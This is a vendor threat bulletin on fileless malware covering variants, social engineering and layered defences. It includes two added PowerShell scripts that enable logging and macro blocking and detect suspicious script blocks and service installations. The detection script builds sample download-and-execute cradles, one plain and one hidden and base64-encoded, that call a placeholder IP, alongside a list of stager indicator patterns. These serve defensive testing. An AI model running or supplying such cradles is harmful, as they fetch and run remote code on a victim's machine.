Fileless Malware - The Stealth Attacker
Threat Bulletin, October 2018



www.allot.com See. Control. Secure.

Fileless Malware - The Stealth Attacker

Fileless malware (FM), also known as "non-malware" or a "fileless infection", is a form of malicious code that lives entirely in volatile storage: RAM, the address space of running processes, and other in-memory service areas. This distinguishes it from the classic memory-resident virus, which also executes from memory but arrives on, and spreads through, permanent storage media such as a hard disk drive or a USB flash drive.

Normally picked up when a user visits a malicious website, fileless malware never exists as a file that a standard antivirus program can scan. It lurks in the computer's memory and is exceptionally difficult to identify. On the upside, this type of malware rarely survives a reboot, after which the computer should work as it did before the infection. Newer variants, however, are increasingly able to attach themselves to existing binaries and scripts, or to implant themselves in the operating system's registry, from where they can sometimes survive even a hard reset. FM normally finds its way into target systems through standard Windows components such as Microsoft PowerShell, which lets attackers reach Windows internals without dropping a file that would be detected; Kaspersky Lab attributed 70 percent of the attacks it identified to PowerShell scripts. Because the attacks are launched through trusted, legitimate components, detecting and mitigating them is considerably harder.

The Ponemon Institute, an organization that, among other activities, evaluates online threats and their financial impact, identified FM attacks as one of the most successful forms of malware attack on global institutions. Kaspersky Lab found that over 140 government, telecom, and financial institutions across 40 countries had been infected by this form of attack.


Fileless Malware Variants

One fileless malware variant is CactusTorch, which executes custom shellcode on Windows to deliver its payload. It uses DotNetToJScript, a technique that serializes a .NET assembly and embeds it in a JScript (or VBScript) file, so the assembly is loaded straight from the script into memory rather than being compiled and written to disk as an .EXE or .DLL. Because the generated assemblies exist only inside the script text, standard antivirus programs have much less to scan for. As with other FM, CactusTorch is loaded into memory at run time, which bypasses most file-based malware detection. CactusTorch has since spawned a further 30 variants.

Another FM, PowerGhost, uses a range of fileless techniques to avoid detection and is designed to hijack corporate resources to mine cryptocurrency. During infection, a one-line PowerShell script is delivered to the victim and run, and it is this one-liner that installs the mining program.

Gold Dragon is yet another FM, created to coincide with the 2018 Winter Olympics in South Korea. A Korean-language implant, it formed the second-stage payload in the Olympics attack, providing a stronger persistence mechanism than the initial fileless PowerShell implant could offer on its own. Gold Dragon also contained a key-generation routine used to encrypt the data gathered during the attack.

Of course, the simplest FM attacks of all are those triggered by the targets themselves, such as malicious code embedded in document macros. Microsoft Word and Excel both include labor-saving macro facilities, and a malicious macro can launch PowerShell and lead to a Trojan installation.

Social Engineering

One of the most common ways that attackers lure their targets into FM traps is social engineering. This involves observing target behavior on social media to determine the interests, hobbies, and passions of their "marks", and then using that knowledge to craft a convincing lure. The lure itself is typically delivered through phishing emails, malvertisements, or watering-hole websites.

Education is the best way to mitigate and minimize the likelihood of a malware attack through social engineering channels. Employees and consumers must become aware of the risks of exposing information about themselves on social media that can then be used to hook a target and lure them into a malware trap.

Fileless Malware Mitigation

As nothing is normally written to the hard disk during an FM attack, standard signature-based antivirus programs are normally ineffective. So what is the best way to mitigate FM attacks if, on the surface, they appear to be executing legitimate computer instructions? The simplest way to avoid this type of malware is not to click on the links that install the malicious code. Of course, this is not always possible, particularly when the malware is served from legitimate-looking websites. Furthermore, attackers are often adept at redirecting their targets to fraudulent web locations that are near-perfect copies of legitimate websites.


Multi-Layer Security

As FM is difficult to detect using standard antivirus packages,

and it is hard to remove even if it is located, multi-level security

provides a robust method of defending against memory-resident

malware. This approach is increasingly deployed due to the

expansion of corporate network perimeters as the growing use

of mobile, IoT, and cloud technology make traditional antivirus

protection ineffective.

Multi-layer defense involves applying security measures across all of an enterprise's technology platforms. As an example, the smartphone layer would include the following security measures:

o Preventing modified operating systems from booting
o Kernel integrity monitoring
o Isolated execution on secure co-processors
o Drive encryption
o Secure storage

Similar defenses should be established across the other layers of an organization's technology infrastructure, including:

o Firewall management
o Email protection
o Web gateways
o Micro-segmentation of data

In addition to going multi-layer, enterprises must also get predictive. Potential FM attacks can be mitigated by monitoring for suspicious network behavior. For example, flagging connections whose source IP addresses geolocate to unusual or unexpected regions allows those connections to be reviewed and potentially blocked.

Artificial intelligence (AI) is probably the direction in which the next generation of antivirus programs will develop. AI can learn what "normal" network behavior looks like and flag anomalies against that baseline. Such solutions must also be able to isolate individual endpoints on the network and prevent an infection from spreading through the rest of the system.

However, there are other, more immediately effective measures that companies and consumers can take to avoid painful FM attacks. These include the following:

o Patching operating systems as frequently as the manufacturers recommend
o Implementing "least privilege" and enabling PowerShell logging
o Instituting regular network behavior analysis, including monitoring of process creation logs for unusual activity
o Disabling unnecessary macros in Office programs such as Excel, PowerPoint, and Word
o Monitoring services to spot any unusual service creation
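The following script is added here as a worked example and is not part of the Allot bulletin. It applies three of the measures above on a single Windows host: it enables PowerShell script block logging, module logging and transcription, and sets the Office macro policy so that unsigned macros, and macros in files downloaded from the internet, are blocked. It writes the same registry values that the corresponding Group Policy settings write. The transcript directory C:\PSTranscripts is an assumed path, and the Office keys live under HKCU, so they take effect for the running user only; in a fleet these settings belong in Group Policy rather than a local script.

```powershell
#Requires -RunAsAdministrator
# Added example, not part of the Allot bulletin. Writes the registry values behind the
# Group Policy settings for PowerShell logging and Office macro control.
Set-StrictMode -Version Latest

function Set-PolicyValue {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)]$Value,
        [ValidateSet('DWord', 'String')][string]$Type = 'DWord'
    )
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

$psPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Script Block Logging: every block the engine compiles is written to the
# Microsoft-Windows-PowerShell/Operational log as Event ID 4104, after
# -EncodedCommand and string-building obfuscation have been unwrapped.
Set-PolicyValue "$psPolicy\ScriptBlockLogging" 'EnableScriptBlockLogging' 1

# Module Logging for all modules: pipeline execution details, Event ID 4103.
Set-PolicyValue "$psPolicy\ModuleLogging" 'EnableModuleLogging' 1
Set-PolicyValue "$psPolicy\ModuleLogging\ModuleNames" '*' '*' -Type String

# Transcription: a plain-text record of every session. The directory is an
# assumed path; in production point it at a write-only network share so an
# attacker on the host cannot tamper with the transcripts.
$transcriptDir = 'C:\PSTranscripts'
Set-PolicyValue "$psPolicy\Transcription" 'EnableTranscripting' 1
Set-PolicyValue "$psPolicy\Transcription" 'EnableInvocationHeader' 1
Set-PolicyValue "$psPolicy\Transcription" 'OutputDirectory' $transcriptDir -Type String

# Office macro policy (the 16.0 hive covers Office 2016/2019/365). VBAWarnings=3
# disables all macros except those signed by a trusted publisher, and
# blockcontentexecutionfrominternet=1 blocks macros in files that carry the
# Mark-of-the-Web regardless of what the user clicks. These keys live under HKCU,
# so this applies to the current user only; deploy fleet-wide via Group Policy.
foreach ($app in 'Word', 'Excel', 'PowerPoint') {
    $sec = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
    Set-PolicyValue $sec 'VBAWarnings' 3
    Set-PolicyValue $sec 'blockcontentexecutionfrominternet' 1
}

# Show what was written.
Get-ItemProperty -Path "$psPolicy\ScriptBlockLogging", "$psPolicy\ModuleLogging", "$psPolicy\Transcription" |
    Format-List
```

Run it from an elevated PowerShell prompt. Script block logging is the setting that matters most against the PowerShell-based attacks in this bulletin, because the logged text is the de-obfuscated code the engine actually ran, not the encoded wrapper that launched it.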

Rapid Response

FM runs in RAM even after the program that introduced it, such as a web browser, has been closed, giving the attacker a command and control channel that is ready to receive further malicious payloads. While a regular reboot would normally remove the FM, the malware may persist on mobile devices and other systems that are rarely powered down. Early FM used a separate downloader program to install the malicious code, but exploit kits such as Angler now enable even inexperienced attackers to implant FM code easily.

Due to the increasingly sophisticated nature of FM attacks, it is essential that this type of intrusion is identified rapidly and blocked. One of the most efficient ways of identifying FM attacks is network monitoring that detects suspicious traffic and connections to malicious sites. To meet this need, some antivirus programs now include behavioral or heuristic detection methods.

While PowerShell and other scripting hosts launch as regular, legitimate applications, the footholds they leave behind can be detected by monitoring registry entries (for example, newly created autorun keys) and by reviewing the PowerShell logs that the mitigation list above recommends enabling. Memory analysis tools can also be deployed to detect and analyze malware in RAM and provide alerts and recommendations.
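As an added example that is not from the bulletin, the PowerShell below implements the two detection checks just described in code: a rule that scans the script text recorded by Script Block Logging (Event ID 4104) for download-cradle and obfuscation indicators, decoding any -EncodedCommand payload first so the rule sees the real command, and a rule that flags service installations (System log, Event ID 7045) whose image path is a script interpreter rather than a program. The indicator list is an assumption chosen for illustration, and the sample script blocks and image paths at the bottom are constructed, not real events, so the script runs offline; the Get-WinEvent queries in the trailing comment show how to feed it live events.

```powershell
# Added example, not part of the Allot bulletin. Detection rules for PowerShell
# Script Block Logging events (ID 4104) and service installations (ID 7045),
# exercised here against constructed sample text so the script runs offline.
Set-StrictMode -Version Latest

# Indicators typical of PowerShell download cradles and in-memory stagers (assumed list).
$ScriptBlockIndicators = @(
    '\bIEX\b|Invoke-Expression',
    'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest',
    'FromBase64String',
    '-[Ee]nc(odedCommand)?\b',
    '-[Ww](indowStyle)?\s+[Hh]idden',
    '-[Nn]o[Pp](rofile)?\b.*-[Ee]xec(utionPolicy)?\s+[Bb]ypass',
    'Reflection\.Assembly\]::Load',
    'VirtualAlloc|WriteProcessMemory|CreateThread'
)

function ConvertFrom-EncodedCommand {
    # -EncodedCommand payloads are base64 of UTF-16LE text. Decode them and append
    # the plaintext so the same indicator rules see inside the wrapper.
    param([Parameter(Mandatory)][string]$Text)
    $decoded = foreach ($m in [regex]::Matches($Text, '-[Ee]nc(?:odedCommand)?\s+([A-Za-z0-9+/=]{20,})')) {
        try { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) } catch { }
    }
    if ($decoded) { "$Text`n$($decoded -join "`n")" } else { $Text }
}

function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][string]$ScriptBlockText)
    $expanded = ConvertFrom-EncodedCommand $ScriptBlockText
    $hits = @($ScriptBlockIndicators | Where-Object { $expanded -match $_ })
    $decodedText = if ($expanded.Length -gt $ScriptBlockText.Length) { $expanded.Substring($ScriptBlockText.Length + 1) } else { $null }
    [pscustomobject]@{
        Suspicious = ($hits.Count -gt 0)
        Indicators = $hits
        Decoded    = $decodedText
    }
}

function Test-SuspiciousServiceCreation {
    # A new service whose binary is a script interpreter rather than a program
    # file is the "unusual service creation" the bulletin says to watch for.
    param([Parameter(Mandatory)][string]$ImagePath)
    $ImagePath -match 'powershell(\.exe)?|pwsh|cmd\.exe\s+/c|mshta|wscript|cscript|rundll32|regsvr32'
}

# --- Constructed samples (not real events) ---
$cradle  = 'IEX (New-Object Net.WebClient).DownloadString(''http://192.0.2.10/stage.ps1'')'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$sampleBlocks = @(
    'Get-Service | Where-Object Status -eq Running | Export-Csv C:\reports\services.csv',  # benign admin task
    $cradle,                                                                               # one-line stager
    "powershell.exe -nop -w hidden -enc $encoded"                                          # same stager, wrapped
)
$sampleImagePaths = @(
    'C:\Windows\System32\svchost.exe -k netsvcs',
    "powershell.exe -nop -w hidden -enc $encoded"
)

foreach ($block in $sampleBlocks) {
    $r = Test-SuspiciousScriptBlock $block
    $flag = if ($r.Suspicious) { 'SUSPECT' } else { 'ok' }
    '{0,-8} 4104: {1}' -f $flag, $block.Substring(0, [Math]::Min(72, $block.Length))
    if ($r.Indicators) { '         indicators: ' + ($r.Indicators -join '; ') }
    if ($r.Decoded)    { '         decoded:    ' + $r.Decoded }
}
foreach ($path in $sampleImagePaths) {
    $flag = if (Test-SuspiciousServiceCreation $path) { 'SUSPECT' } else { 'ok' }
    '{0,-8} 7045: {1}' -f $flag, $path.Substring(0, [Math]::Min(72, $path.Length))
}

# On a live host with Script Block Logging enabled, run the same rules over real events:
#   Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} -MaxEvents 500 |
#       ForEach-Object { $_.Properties[2].Value } | Where-Object { (Test-SuspiciousScriptBlock $_).Suspicious }
#   Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045} |
#       ForEach-Object { $_.Properties[1].Value } | Where-Object { Test-SuspiciousServiceCreation $_ }
```

The benign sample produces no hits; the plain cradle is flagged on the IEX and DownloadString indicators; and the encoded sample is flagged both on its wrapper (-w hidden, -enc) and, after decoding, on the same cradle indicators, which is the point of decoding before matching. Pattern lists like this are a starting point for triage, not a complete detection: an attacker who knows the list can rename or split the tokens, which is why the bulletin pairs log review with behavioral monitoring.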


Conclusion

Fileless malware attacks have increased in number and sophistication since the start of 2017. The Ponemon Institute states that seven out of ten organizations in a 2017 poll reported a significant increase in endpoint security risk, with 77% of successful attacks utilizing fileless techniques. The same report confirmed that traditional antivirus solutions have become ineffective, with four out of five organizations dissatisfied with their existing antivirus packages. Endpoint solutions are increasingly deployed as organizations turn their focus from network-only solutions to a multi-layered security approach. Organizations in the Ponemon survey also confirmed that traditional network security is not only ineffective but also difficult and expensive to manage.

Despite the risks posed by FM, the steps to mitigate the threat are relatively simple and inexpensive. Educating home consumers and company employees is certainly one of the most effective ways of reducing the chance of FM infection, and campaigns that spread the message about the risk from this type of malware should be expanded.


Are you concerned about fileless malware attacks?

Allot’s NetworkSecure and HomeSecure products can assist.

Contact Allot »